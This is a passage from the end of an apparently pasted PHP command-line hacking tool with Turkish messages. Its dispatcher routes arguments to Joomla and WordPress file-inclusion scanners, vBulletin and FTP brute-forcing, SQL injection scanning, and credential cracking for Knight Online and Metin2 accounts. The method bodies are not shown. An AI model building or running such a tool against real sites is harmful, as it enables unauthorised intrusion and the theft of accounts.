  1586. if($argv[1]=="jomlfi"){
  1587. echo "\nJoomla LFI Araniyor...\n\n";
  1588. ob_flush();
  1589. flush();
  1590.  
  1591. $tool->jomlfi();
  1592.  
  1593. }
  1594. if($argv[1]=="jomrfi"){
  1595. echo "\nJoomla RFI Araniyor...\n\n";
  1596. ob_flush();
  1597. flush();
  1598.  
  1599. $tool->jomrfi();
  1600.  
  1601. }
  1602. if($argv[1]=="wprfi"){
  1603. echo "\nWordpress RFI Araniyor...\n\n";
  1604. ob_flush();
  1605. flush();
  1606.  
  1607. $tool->wprfi();
  1608. }
  1609. if($argv[1]=="vbrute"){
  1610. echo "\nvBulletin Brute Force basladi...\n\n";
  1611. ob_flush();
  1612. flush();
  1613.  
  1614. $tool->vbrute_2();
  1615. }
  1616. if($argv[1]=="datasql"){
  1617. echo "\nvBulletin Data SQL Aramasi basladi...\n\n";
  1618.  
  1619. ob_flush();
  1620. flush();
  1621.  
  1622. $tool->datasql();
  1623. }
  1624. if($argv[1]=="pagerank"){
  1625.  
  1626. echo "\nPagerank Check basladi...\n\n";
  1627. ob_flush();
  1628. flush();
  1629.  
  1630. $tool->pagerank();
  1631. }
  1632. if($argv[1]=="sqlinj"){
  1633. echo "\nSQL Injection Taramasi basladi...\n\n";
  1634. ob_flush();
  1635. flush();
  1636.  
  1637. $tool->sqlinj();
  1638. }
  1639. if($argv[1]=="ftpbrute"){
  1640. echo "\nFTP Kirma islemi basladi...\n\n";
  1641. ob_flush();
  1642. flush();
  1643.  
  1644. $tool->ftpbrute($argv[2]);
  1645. }
  1646. if($argv[1]=="kobrute"){
  1647. echo "\nKnight OnLine Crack islemi basladi...\n\n";
  1648. ob_flush();
  1649. flush();
  1650.  
  1651. $tool->kobrute();
  1652. }
  1653. if($argv[1]=="metinbrute"){
  1654. echo "\nMetin2 Crack islemi basladi...\n\n";
  1655. ob_flush();
  1656. flush();
  1657.  
  1658. $tool->metinbrute();
  1659. }
  1660. ?>
  1661.  
Advertisement
Add Comment
Please, Sign In to add comment